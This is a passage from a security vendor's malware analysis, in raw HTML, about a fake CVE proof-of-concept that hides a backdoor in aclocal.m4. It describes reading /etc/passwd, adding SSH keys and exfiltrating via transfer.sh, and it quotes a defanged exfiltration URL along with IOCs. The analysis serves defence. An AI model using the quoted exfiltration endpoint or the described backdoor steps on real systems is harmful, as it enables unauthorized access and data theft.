<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%2012-3.png?width=813&amp;height=256&amp;name=Figure%2012-3.png" alt="Figure 12 - Listing namespaces outside PoC root shell" width="813" height="256" loading="lazy" style="height: auto; max-width: 100%; width: 813px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%2012-3.png?width=407&amp;height=128&amp;name=Figure%2012-3.png 407w, https://www.uptycs.com/hs-fs/hubfs/Figure%2012-3.png?width=813&amp;height=256&amp;name=Figure%2012-3.png 813w, https://www.uptycs.com/hs-fs/hubfs/Figure%2012-3.png?width=1220&amp;height=384&amp;name=Figure%2012-3.png 1220w, https://www.uptycs.com/hs-fs/hubfs/Figure%2012-3.png?width=1626&amp;height=512&amp;name=Figure%2012-3.png 1626w, https://www.uptycs.com/hs-fs/hubfs/Figure%2012-3.png?width=2033&amp;height=640&amp;name=Figure%2012-3.png 2033w, https://www.uptycs.com/hs-fs/hubfs/Figure%2012-3.png?width=2439&amp;height=768&amp;name=Figure%2012-3.png 2439w" sizes="(max-width: 813px) 100vw, 813px"><em><span style="font-size: 14px;">Figure 12 – Listing namespaces outside PoC root shell</span></em></p>
<p>&nbsp;</p>
<p>As seen in figures 11 and 12, the <span style="font-family: 'Courier New', Courier, monospace;">user</span> namespace differs between the two shells, implying they’re using two distinct namespaces.<br><br>(Linux kernel namespaces permit isolation of system resources. Each provides an independent environment for specific resources (e.g., PIDs, network interfaces, file systems, et al.). Such isolation helps prevent interference and provides a level of security between processes or components running on the system.)<br><br>Here, the phony PoC takes advantage of the namespace concept to create the illusion of being a root shell. Specifically, it manipulates the user namespace, which is responsible for managing user and group identities within a given process or container. But in reality, granted privileges are limited to the <span style="font-family: 'Courier New', Courier, monospace;">/bin/bash</span> shell within a given namespace.</p>
<p>&nbsp;</p>
<h2>Detection through Uptycs XDR</h2>
<p>Using Uptycs XDR, we detected that the binary primarily acts as a downloader, retrieving a script from a remote source and executing it on the compromised system. Upon execution, the downloaded script initially accesses the <span style="font-family: 'Courier New', Courier, monospace;">/etc/passwd</span> file. Then it modifies the <span style="font-family: 'Courier New', Courier, monospace;">~/.ssh/authorized_keys</span> to grant unauthorized access and employs <span style="font-family: 'Courier New', Courier, monospace;">curl</span> to exfiltrate data via <span style="font-family: 'Courier New', Courier, monospace;">transfer[.]sh</span>. In correlation with the MITRE ATT&amp;CK matrix, the combination of these actions caused a medium-level detection in Uptycs XDR.&nbsp;</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%2013-1.png?width=1854&amp;height=853&amp;name=Figure%2013-1.png" alt="Figure 13 – Uptycs XDR detection" width="1854" height="853" loading="lazy" style="height: auto; max-width: 100%; width: 1854px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%2013-1.png?width=927&amp;height=427&amp;name=Figure%2013-1.png 927w, https://www.uptycs.com/hs-fs/hubfs/Figure%2013-1.png?width=1854&amp;height=853&amp;name=Figure%2013-1.png 1854w, https://www.uptycs.com/hs-fs/hubfs/Figure%2013-1.png?width=2781&amp;height=1280&amp;name=Figure%2013-1.png 2781w, https://www.uptycs.com/hs-fs/hubfs/Figure%2013-1.png?width=3708&amp;height=1706&amp;name=Figure%2013-1.png 3708w, https://www.uptycs.com/hs-fs/hubfs/Figure%2013-1.png?width=4635&amp;height=2133&amp;name=Figure%2013-1.png 4635w, https://www.uptycs.com/hs-fs/hubfs/Figure%2013-1.png?width=5562&amp;height=2559&amp;name=Figure%2013-1.png 5562w" sizes="(max-width: 1854px) 100vw, 1854px"><em><span style="font-size: 14px;">Figure 13 – Uptycs XDR detection</span></em></p>
<p>&nbsp;</p>
<p>The following is a URL example used to exfiltrate data:<br><br></p>
<p style="padding-left: 40px;"><span style="font-family: 'Courier New', Courier, monospace;">hxxp[:]//cunniloss[.]accesscam[.]org/term[.]php[?]term[=]hxxps[:]//transfer[.]sh/rnmWbQyyz8/&lt;username&gt;[.]txt</span></p>
<p>&nbsp;</p>
<p>(Note: The domain that hosts the script has been taken down, so a detailed analysis cannot be done in this article.)</p>
<p>&nbsp;</p>
<h2>Conclusion</h2>
<p>The Uptycs team has seen this modus operandi <a href="https://thehackernews.com/2023/06/fake-researcher-profiles-spread-malware.html" rel="noopener" target="_blank">earlier</a>; spreading malware through a malicious PoC is not new. The same profile, ChriSander22, is circulating another bogus PoC for VMware Fusion CVE-2023-20871. Its contents are the same as CVE-2023-35829, with the same<span style="font-family: 'Courier New', Courier, monospace;"> aclocal.m4</span> triggering installation of the hidden backdoor. Both of ChriSander22’s other repositories are down, but we cannot confirm whether it was Github that did this or the profile owner.</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%2014-1.png?width=531&amp;height=682&amp;name=Figure%2014-1.png" alt="Figure 14 – Directory of phony CVE-2023-20871 PoC" width="531" height="682" loading="lazy" style="height: auto; max-width: 100%; width: 531px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%2014-1.png?width=266&amp;height=341&amp;name=Figure%2014-1.png 266w, https://www.uptycs.com/hs-fs/hubfs/Figure%2014-1.png?width=531&amp;height=682&amp;name=Figure%2014-1.png 531w, https://www.uptycs.com/hs-fs/hubfs/Figure%2014-1.png?width=797&amp;height=1023&amp;name=Figure%2014-1.png 797w, https://www.uptycs.com/hs-fs/hubfs/Figure%2014-1.png?width=1062&amp;height=1364&amp;name=Figure%2014-1.png 1062w, https://www.uptycs.com/hs-fs/hubfs/Figure%2014-1.png?width=1328&amp;height=1705&amp;name=Figure%2014-1.png 1328w, https://www.uptycs.com/hs-fs/hubfs/Figure%2014-1.png?width=1593&amp;height=2046&amp;name=Figure%2014-1.png 1593w" sizes="(max-width: 531px) 100vw, 531px"><em><span style="font-size: 14px;">Figure 14 – Directory of phony CVE-2023-20871 PoC</span></em></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%2015-1.png?width=1817&amp;height=840&amp;name=Figure%2015-1.png" alt="Figure 15 – Github profile page of fake PoC" width="1817" height="840" loading="lazy" style="height: auto; max-width: 100%; width: 1817px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%2015-1.png?width=909&amp;height=420&amp;name=Figure%2015-1.png 909w, https://www.uptycs.com/hs-fs/hubfs/Figure%2015-1.png?width=1817&amp;height=840&amp;name=Figure%2015-1.png 1817w, https://www.uptycs.com/hs-fs/hubfs/Figure%2015-1.png?width=2726&amp;height=1260&amp;name=Figure%2015-1.png 2726w, https://www.uptycs.com/hs-fs/hubfs/Figure%2015-1.png?width=3634&amp;height=1680&amp;name=Figure%2015-1.png 3634w, https://www.uptycs.com/hs-fs/hubfs/Figure%2015-1.png?width=4543&amp;height=2100&amp;name=Figure%2015-1.png 4543w, https://www.uptycs.com/hs-fs/hubfs/Figure%2015-1.png?width=5451&amp;height=2520&amp;name=Figure%2015-1.png 5451w" sizes="(max-width: 1817px) 100vw, 1817px"><em><span style="font-size: 14px;">Figure 15 – Github profile page of fake PoC</span></em></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%2016-1.png?width=1806&amp;height=851&amp;name=Figure%2016-1.png" alt="Figure 16 – Another Github profile page of fake PoCs" width="1806" height="851" loading="lazy" style="height: auto; max-width: 100%; width: 1806px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%2016-1.png?width=903&amp;height=426&amp;name=Figure%2016-1.png 903w, https://www.uptycs.com/hs-fs/hubfs/Figure%2016-1.png?width=1806&amp;height=851&amp;name=Figure%2016-1.png 1806w, https://www.uptycs.com/hs-fs/hubfs/Figure%2016-1.png?width=2709&amp;height=1277&amp;name=Figure%2016-1.png 2709w, https://www.uptycs.com/hs-fs/hubfs/Figure%2016-1.png?width=3612&amp;height=1702&amp;name=Figure%2016-1.png 3612w, https://www.uptycs.com/hs-fs/hubfs/Figure%2016-1.png?width=4515&amp;height=2128&amp;name=Figure%2016-1.png 4515w, https://www.uptycs.com/hs-fs/hubfs/Figure%2016-1.png?width=5418&amp;height=2553&amp;name=Figure%2016-1.png 5418w" sizes="(max-width: 1806px) 100vw, 1806px"><em><span style="font-size: 14px;">Figure 16 – Another Github profile page of fake PoCs</span></em></p>
<p>&nbsp;</p>
<h3>IOCs</h3>
<div data-hs-responsive-table="true" style="overflow-x: auto; max-width: 100%; width: 100%; margin-left: auto; margin-right: auto; font-size: 16px;">
<table style="width: 100%; border-collapse: collapse; table-layout: fixed; border: 1px solid #99acc2; height: 69.0625px;">
<tbody>
<tr style="height: 34.0767px;">
<td style="width: 21.0391%; padding: 4px; height: 34px; border-width: 1px; border-style: solid;"><strong>File name</strong></td>
<td style="width: 78.9518%; padding: 4px; height: 34px; border-width: 1px; border-style: solid;"><strong>sha256</strong></td>
</tr>
<tr style="height: 34.0767px;">
<td style="width: 21.0391%; padding: 4px; height: 34px; border-width: 1px; border-style: solid;">aclocal.m4</td>
<td style="width: 78.9518%; padding: 4px; height: 34px; border-width: 1px; border-style: solid;">caa69b10b0bfca561dec90cbd1132b6dcb2c8a44d76a272a0b70b5c64776ff6c</td>
</tr>
</tbody>
</table>
</div>
<h3>URLs</h3>
<p><span style="font-family: 'Courier New', Courier, monospace;">hxxp[:]//cunniloss[.]accesscam[.]org</span><br><span style="font-family: 'Courier New', Courier, monospace;">hxxp[:]//transfer[.]sh</span><br><span style="font-family: 'Courier New', Courier, monospace;">IP 81[.]4[.]109[.]16</span></p></span>
            </div>
          </article>
        </div>

        <div class="blogPostAreaSideCol">

          <div class="insidecontainer">

            <div class="signup_form_blog">
              <div id="hs_cos_wrapper_module_17187801896782" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.css">
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.pack.js"></script>
<!-- <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/fancybox/fancybox.css" /> -->

<div class="report-popup-section" id="hidden" style="display:none">
  <div class="left-section">
    
    
    <div class="top-image">
      <img src="https://www.uptycs.com/hubfs/thumbnail-blog.png" alt="thumbnail-blog" loading="">
    </div>
    
    
    <div class="report-head">
      Analyst Report
    </div>
    
    
    <div class="heading">
      <h4>Market Guide for Cloud-Native Application Protection Platforms (CNAPP)</h4>
    </div>
    
    <div class="download-text">
      Download the report to:
    </div>
    <div class="report-points">
      <div class="list-inner">
        
        <ul>
<li>Learn how CNAPP can help you unify and consolidate your cloud and application security efforts.</li>
<li>Discover actionable insights for successfully evaluating and purchasing a CNAPP solution.</li>
<li>See why Uptycs was recognized as a Representative Vendor in the Gartner Market Guide for Cloud Native Application Protection Platforms (CNAPP).*</li>
</ul>
        
      </div>
    </div>
  </div>
  <div class="right-section">
    <div class="form-head">
      Fill the form to download the report
    </div>
    <div class="report-form">
      <span id="hs_cos_wrapper_module_17187801896782_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_form" style="" data-hs-cos-general-type="widget" data-hs-cos-type="form"><h3 id="hs_cos_wrapper_form_770361775_title" class="hs_cos_wrapper form-title" data-hs-cos-general-type="widget_field" data-hs-cos-type="text"></h3>

<div id="hs_form_target_form_770361775"></div>









</span>
    </div>
  </div>
</div>

<div class="report-side-section">
  <div class="top-image">
    <img src="https://www.uptycs.com/hubfs/thumbnail-blog.png" alt="thumbnail-blog" loading="">
  </div>
  <div class="report-head">
    Analyst Report
  </div>
  <div class="heading">
    <h4>Market Guide for Cloud-Native Application Protection Platforms (CNAPP)</h4>
  </div>
  
  <a href="https://www.uptycs.com/resources/analyst-reports/gartner-cnapp-market-guide-2024" class="ebook-button">
    <div class="cta_button"> 
      Download Report
    </div>
  </a>
  
</div>


</div>
            </div>

            <div class="recommended_wrap">
              <div id="hs_cos_wrapper_scroll_section" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"></div>
            </div>

          </div>
        </div> 
      </div> 

    </div>


  </div> 

  <div class="related-bottom">
    

    
  
    
    <section class="blog-related-posts">
      <div class="content-wrapper">
        <h2>Recommended Content</h2>
        <div class="blog-related-posts__list">
          
          <article class="blog-related-posts__post" aria-label="Blog post summary: RTM Locker Ransomware as a Service (RaaS) Now Suits Up for Linux Architecture">
            
            <a class="blog-related-posts__post-image-wrapper" href="https://www.uptycs.com/blog/threat-research-report-team/rtm-locker-ransomware-as-a-service-raas-linux" aria-label="Read full post: RTM Locker Ransomware as a Service (RaaS) Now Suits Up for Linux Architecture">
              <img class="blog-related-posts__image" src="https://www.uptycs.com/hs-fs/hubfs/RTM%20Locker%20Ransomware%20as%20a%20Service%20-%20Featured%20Image.png?width=352&amp;name=RTM%20Locker%20Ransomware%20as%20a%20Service%20-%20Featured%20Image.png" loading="lazy" width="352" alt="" srcset="https://www.uptycs.com/hs-fs/hubfs/RTM%20Locker%20Ransomware%20as%20a%20Service%20-%20Featured%20Image.png?width=176&amp;name=RTM%20Locker%20Ransomware%20as%20a%20Service%20-%20Featured%20Image.png 176w, https://www.uptycs.com/hs-fs/hubfs/RTM%20Locker%20Ransomware%20as%20a%20Service%20-%20Featured%20Image.png?width=352&amp;name=RTM%20Locker%20Ransomware%20as%20a%20Service%20-%20Featured%20Image.png 352w, https://www.uptycs.com/hs-fs/hubfs/RTM%20Locker%20Ransomware%20as%20a%20Service%20-%20Featured%20Image.png?width=528&amp;name=RTM%20Locker%20Ransomware%20as%20a%20Service%20-%20Featured%20Image.png 528w, https://www.uptycs.com/hs-fs/hubfs/RTM%20Locker%20Ransomware%20as%20a%20Service%20-%20Featured%20Image.png?width=704&amp;name=RTM%20Locker%20Ransomware%20as%20a%20Service%20-%20Featured%20Image.png 704w, https://www.uptycs.com/hs-fs/hubfs/RTM%20Locker%20Ransomware%20as%20a%20Service%20-%20Featured%20Image.png?width=880&amp;name=RTM%20Locker%20Ransomware%20as%20a%20Service%20-%20Featured%20Image.png 880w, https://www.uptycs.com/hs-fs/hubfs/RTM%20Locker%20Ransomware%20as%20a%20Service%20-%20Featured%20Image.png?width=1056&amp;name=RTM%20Locker%20Ransomware%20as%20a%20Service%20-%20Featured%20Image.png 1056w" sizes="(max-width: 352px) 100vw, 352px">
            </a>
            
            <div class="blog-related-posts__content">
              <h3 class="blog-related-posts__title">
                <a class="blog-related-posts__title-link" href="https://www.uptycs.com/blog/threat-research-report-team/rtm-locker-ransomware-as-a-service-raas-linux">RTM Locker Ransomware as a Service (RaaS) Now Suits Up for Linux Architecture</a>
              </h3>
              
            </div>
          </article>

          
    

  
    
          <article class="blog-related-posts__post" aria-label="Blog post summary: Detecting Silver Sparrow MacOS Malware Using Uptycs">
            
            <a class="blog-related-posts__post-image-wrapper" href="https://www.uptycs.com/blog/threat-research-report-team/silver-sparrow-macos-malware-detection-with-uptycs" aria-label=" Featured image: Silver Sparrow macOS malware detection with Uptycs - Read full post: Detecting Silver Sparrow MacOS Malware Using Uptycs">
              <img class="blog-related-posts__image" src="https://www.uptycs.com/hs-fs/hubfs/1-silver-sparrow-1280x720-featured.png?width=352&amp;name=1-silver-sparrow-1280x720-featured.png" loading="lazy" width="352" alt="Silver Sparrow macOS malware detection with Uptycs" srcset="https://www.uptycs.com/hs-fs/hubfs/1-silver-sparrow-1280x720-featured.png?width=176&amp;name=1-silver-sparrow-1280x720-featured.png 176w, https://www.uptycs.com/hs-fs/hubfs/1-silver-sparrow-1280x720-featured.png?width=352&amp;name=1-silver-sparrow-1280x720-featured.png 352w, https://www.uptycs.com/hs-fs/hubfs/1-silver-sparrow-1280x720-featured.png?width=528&amp;name=1-silver-sparrow-1280x720-featured.png 528w, https://www.uptycs.com/hs-fs/hubfs/1-silver-sparrow-1280x720-featured.png?width=704&amp;name=1-silver-sparrow-1280x720-featured.png 704w, https://www.uptycs.com/hs-fs/hubfs/1-silver-sparrow-1280x720-featured.png?width=880&amp;name=1-silver-sparrow-1280x720-featured.png 880w, https://www.uptycs.com/hs-fs/hubfs/1-silver-sparrow-1280x720-featured.png?width=1056&amp;name=1-silver-sparrow-1280x720-featured.png 1056w" sizes="(max-width: 352px) 100vw, 352px">
            </a>
            
            <div class="blog-related-posts__content">
              <h3 class="blog-related-posts__title">
                <a class="blog-related-posts__title-link" href="https://www.uptycs.com/blog/threat-research-report-team/silver-sparrow-macos-malware-detection-with-uptycs">Detecting Silver Sparrow MacOS Malware Using Uptycs</a>
              </h3>
              
            </div>
          </article>

          
    

  
    
          <article class="blog-related-posts__post" aria-label="Blog post summary: Mallox Ransomware Variant Targets Linux: Decryptor Discovered">
            
            <a class="blog-related-posts__post-image-wrapper" href="https://www.uptycs.com/blog/threat-research-report-team/mallox-ransomware-linux-variant-decryptor-discovered" aria-label=" Featured image: mallox ransomware - Read full post: Mallox Ransomware Variant Targets Linux: Decryptor Discovered">
              <img class="blog-related-posts__image" src="https://www.uptycs.com/hs-fs/hubfs/Mallox%20Ransomware%20Blog%20.png?width=352&amp;name=Mallox%20Ransomware%20Blog%20.png" loading="lazy" width="352" alt="mallox ransomware" srcset="https://www.uptycs.com/hs-fs/hubfs/Mallox%20Ransomware%20Blog%20.png?width=176&amp;name=Mallox%20Ransomware%20Blog%20.png 176w, https://www.uptycs.com/hs-fs/hubfs/Mallox%20Ransomware%20Blog%20.png?width=352&amp;name=Mallox%20Ransomware%20Blog%20.png 352w, https://www.uptycs.com/hs-fs/hubfs/Mallox%20Ransomware%20Blog%20.png?width=528&amp;name=Mallox%20Ransomware%20Blog%20.png 528w, https://www.uptycs.com/hs-fs/hubfs/Mallox%20Ransomware%20Blog%20.png?width=704&amp;name=Mallox%20Ransomware%20Blog%20.png 704w, https://www.uptycs.com/hs-fs/hubfs/Mallox%20Ransomware%20Blog%20.png?width=880&amp;name=Mallox%20Ransomware%20Blog%20.png 880w, https://www.uptycs.com/hs-fs/hubfs/Mallox%20Ransomware%20Blog%20.png?width=1056&amp;name=Mallox%20Ransomware%20Blog%20.png 1056w" sizes="(max-width: 352px) 100vw, 352px">
            </a>
            
            <div class="blog-related-posts__content">
              <h3 class="blog-related-posts__title">
                <a class="blog-related-posts__title-link" href="https://www.uptycs.com/blog/threat-research-report-team/mallox-ransomware-linux-variant-decryptor-discovered">Mallox Ransomware Variant Targets Linux: Decryptor Discovered</a>
              </h3>
              
            </div>
          </article>

          
        </div>
      </div>
    </section>
    
    



  </div>


</div>

<script>
  document.addEventListener('DOMContentLoaded', function() {
    // Function to get URL parameters
    function getQueryParam(param) {
      var searchParams = new URLSearchParams(window.location.search);
      return searchParams.get(param);
    }

    // Check if 'hs_amp' parameter is present and true
    if (getQueryParam('hs_amp') === 'true') {
      console.log('AMP version loaded');
    } else {
      console.log('Standard version loaded');
    }
  });
</script>



<script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "BlogPosting",
  "headline": "PoC Exploit: Fake Proof of Concept with Backdoor Malware",
  "image": "https://www.uptycs.com/hubfs/POC%20door.jpg",
  "author": {
    "@type": "Person",
    "name": ""
  },
  "publisher": {
    "@type": "Organization",
    "name": "Uptycs Inc",
    "logo": {
      "@type": "ImageObject",
      "url": " https://www.uptycs.com/hs-fs/hubfs/Logo-2.png?width=232&height=70&name=Logo-2.png"
    }
  },
  "datePublished": "2023-07-12 12:00:00",
  "dateModified": "1723630842108"
}
</script>




      </main>

      
      <div data-global-resource-path="Uptycs_Theme_2023/templates/partials/footer-new.html"><footer class="footer footer_new">
  <div class="container-fluid footer__container content-wrapper">
<div class="row-fluid-wrapper">
<div class="row-fluid">
<div class="span12 widget-span widget-type-cell " style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-1 dnd-section">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell dnd-column" style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-2 dnd-row">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-custom_widget dnd-module" style="" data-widget-type="custom_widget" data-x="0" data-w="12">
<div id="hs_cos_wrapper_widget_1722594192479" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><div class="Footer_Section footer_new">

  <div class="Footer_Box Footer_Box_top">
    <div class="wrapper">
      <div class="Footer_Box">
        <!-- Start Footer Subscribe -->
        <div class="Subscribe">
          <div class="Subscribe_innner">
            
            <div class="Logo_icon">
              
              
              
              
              
              
              <img src="https://www.uptycs.com/hs-fs/hubfs/Uptycs%20Theme%20-%202023/Home%20Page%20Images/Vector.png?width=29&amp;height=30&amp;name=Vector.png" alt="Uptycs" loading="lazy" width="29" height="30" style="max-width: 100%; height: auto;" srcset="https://www.uptycs.com/hs-fs/hubfs/Uptycs%20Theme%20-%202023/Home%20Page%20Images/Vector.png?width=15&amp;height=15&amp;name=Vector.png 15w, https://www.uptycs.com/hs-fs/hubfs/Uptycs%20Theme%20-%202023/Home%20Page%20Images/Vector.png?width=29&amp;height=30&amp;name=Vector.png 29w, https://www.uptycs.com/hs-fs/hubfs/Uptycs%20Theme%20-%202023/Home%20Page%20Images/Vector.png?width=44&amp;height=45&amp;name=Vector.png 44w, https://www.uptycs.com/hs-fs/hubfs/Uptycs%20Theme%20-%202023/Home%20Page%20Images/Vector.png?width=58&amp;height=60&amp;name=Vector.png 58w, https://www.uptycs.com/hs-fs/hubfs/Uptycs%20Theme%20-%202023/Home%20Page%20Images/Vector.png?width=73&amp;height=75&amp;name=Vector.png 73w, https://www.uptycs.com/hs-fs/hubfs/Uptycs%20Theme%20-%202023/Home%20Page%20Images/Vector.png?width=87&amp;height=90&amp;name=Vector.png 87w" sizes="(max-width: 29px) 100vw, 29px">
              
            </div>
            
            <div class="Subscribe_Content">
              
              <h6>Stay in the loop</h6>
              
              
              <p>Get regular updates on all things Uptycs—<br>from product updates to expert articles and much more</p>
              
            </div>
            <div class="Subscribe_field">
              <span id="hs_cos_wrapper_widget_1722594192479_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_form" style="" data-hs-cos-general-type="widget" data-hs-cos-type="form"><h3 id="hs_cos_wrapper_form_255149992_title" class="hs_cos_wrapper form-title" data-hs-cos-general-type="widget_field" data-hs-cos-type="text"></h3>

<div id="hs_form_target_form_255149992"></div>









</span>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>

  <div class="Footer_Box Footer_Box_bottom">
    <div class="wrapper">
      <!-- End Footer Subscribe -->
      <!-- Start Footer Link and Social media  -->
      <div class="Footer pt60 pb80">
        <div class="Footer_inner">


          <!-- Start Social Media -->

          <div class="footer_pre_copy">

            <div class="social">
              <div class="Footer_SocialMedia">
                
                <h5>Follow Us</h5>
                
                <ul>
                  
                  <li>
                    
                    
                    <a href="https://www.linkedin.com/company/uptycs/" target="_blank" rel="noopener">
                      
                      <svg width="12" height="12" viewbox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M2.26897 2.56951C3.07306 2.56951 3.57649 2.03811 3.56949 1.37387C3.5625 0.695637 3.07306 0.178223 2.28295 0.178223C1.49984 0.178223 0.982422 0.695637 0.982422 1.37387C0.982422 2.03811 1.47886 2.56951 2.25498 2.56951H2.26897ZM6.99562 10.4426V6.57598C6.99562 6.36621 7.01659 6.16344 7.07253 6.00962C7.24034 5.59709 7.61791 5.17057 8.25419 5.17057C9.08625 5.17057 9.42187 5.80685 9.42187 6.7368V10.4426H11.7223V6.4711C11.7223 4.3455 10.5895 3.35263 9.07226 3.35263C7.87377 3.35263 7.32365 3.99452 7.01607 4.46663L6.99516 4.49907L6.99562 3.51344H4.69522C4.69522 3.51344 4.72319 4.16371 4.69522 10.4426H6.99562ZM3.42266 10.4426V3.51344H1.11527V10.4426H3.42266Z" fill="#962DE9" /></svg>
                      
                    </a>
                  </li>
                  
                  <li>
                    
                    
                    <a href="https://twitter.com/uptycs?lang=en" target="_blank" rel="noopener">
                      
                      <svg width="14" height="12" viewbox="0 0 14 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M4.27091 10.3906C6.42771 10.3906 8.15746 9.66525 9.46017 8.21458C10.7629 6.76392 11.4142 5.14782 11.4142 3.3663V3.0609C11.9318 2.68763 12.3459 2.26346 12.6565 1.78839C12.2252 1.99199 11.742 2.11924 11.2072 2.17014C11.7766 1.84777 12.1475 1.38966 12.3201 0.795828C11.7679 1.11819 11.233 1.3218 10.7154 1.40663C10.2151 0.880663 9.61115 0.617676 8.90372 0.617676C8.19629 0.617676 7.60101 0.855212 7.11789 1.33028C6.63476 1.80535 6.3932 2.39071 6.3932 3.08635C6.3932 3.34085 6.41046 3.52749 6.44497 3.64626C4.33993 3.54446 2.62311 2.68763 1.29452 1.07578C1.07022 1.46602 0.958063 1.87322 0.958063 2.29739C0.958063 3.19663 1.32903 3.88379 2.07097 4.35886C1.69137 4.35886 1.31178 4.25706 0.93218 4.05346V4.07891C0.93218 4.67275 1.12629 5.19448 1.51452 5.6441C1.90274 6.09373 2.38155 6.37792 2.95095 6.49669C2.67488 6.56456 2.45057 6.59849 2.27802 6.59849C2.1745 6.59849 2.01921 6.58152 1.81216 6.54759C1.96745 7.03963 2.26077 7.44259 2.69213 7.75648C3.12349 8.07036 3.60662 8.23579 4.1415 8.25276C3.22702 8.96537 2.19175 9.32167 1.03571 9.32167C0.914926 9.32167 0.716501 9.3047 0.44043 9.27077C1.61373 10.0173 2.89056 10.3906 4.27091 10.3906Z" fill="#962DE9" /></svg>
                      
                    </a>
                  </li>
                  
                  <li>
                    
                    
                    <a href="https://www.facebook.com/uptycs/" target="_blank" rel="noopener">
                      
                      <svg width="9" height="16" viewbox="0 0 9 16" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M5.9387 14.2018V8.09205H7.98331L8.29724 5.70935H5.9387V4.18797C5.9387 3.50375 6.12384 3.02883 7.11395 3.02883H8.37774V0.903724C8.1604 0.871526 7.41178 0.807129 6.54242 0.807129C4.7232 0.807129 3.47551 1.91798 3.47551 3.95453V5.70935H1.42285V8.09205H3.47551V14.2018H5.9387Z" fill="#962DE9" /></svg>
                      
                    </a>
                  </li>
                  
                  <li>
                    
                    
                    <a href="https://www.youtube.com/@uptycs" target="_blank" rel="noopener">
                      
                      <svg width="15" height="12" viewbox="0 0 15 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M13.1182 0.984606C13.705 1.14249 14.1672 1.60764 14.324 2.19829C14.609 3.26887 14.609 5.50253 14.609 5.50253C14.609 5.50253 14.609 7.73618 14.324 8.80677C14.1672 9.39741 13.705 9.86256 13.1182 10.0205C12.0545 10.3073 7.7894 10.3073 7.7894 10.3073C7.7894 10.3073 3.52426 10.3073 2.4606 10.0205C1.87376 9.86256 1.41159 9.39741 1.25474 8.80677C0.969727 7.73618 0.969727 5.50253 0.969727 5.50253C0.969727 5.50253 0.969727 3.26887 1.25474 2.19829C1.41159 1.60764 1.87376 1.14247 2.4606 0.984606C3.52426 0.697754 7.7894 0.697754 7.7894 0.697754C7.7894 0.697754 12.0545 0.697754 13.1182 0.984606ZM9.95894 5.50266L6.39412 7.53061V3.47461L9.95894 5.50266Z" fill="#962DE9" /></svg>
                      
                    </a>
                  </li>
                  
                </ul>
              </div>
            </div>

            <div class="partners">
              
              
              
              
              
              <img class="footer_icons_new" src="https://www.uptycs.com/hs-fs/hubfs/Group%20117%20(2).png?width=365&amp;height=117&amp;name=Group%20117%20(2).png" alt="partner-image" loading="" width="365" height="117" srcset="https://www.uptycs.com/hs-fs/hubfs/Group%20117%20(2).png?width=183&amp;height=59&amp;name=Group%20117%20(2).png 183w, https://www.uptycs.com/hs-fs/hubfs/Group%20117%20(2).png?width=365&amp;height=117&amp;name=Group%20117%20(2).png 365w, https://www.uptycs.com/hs-fs/hubfs/Group%20117%20(2).png?width=548&amp;height=176&amp;name=Group%20117%20(2).png 548w, https://www.uptycs.com/hs-fs/hubfs/Group%20117%20(2).png?width=730&amp;height=234&amp;name=Group%20117%20(2).png 730w, https://www.uptycs.com/hs-fs/hubfs/Group%20117%20(2).png?width=913&amp;height=293&amp;name=Group%20117%20(2).png 913w, https://www.uptycs.com/hs-fs/hubfs/Group%20117%20(2).png?width=1095&amp;height=351&amp;name=Group%20117%20(2).png 1095w" sizes="(max-width: 365px) 100vw, 365px"> 
              
              
              
              
              
              
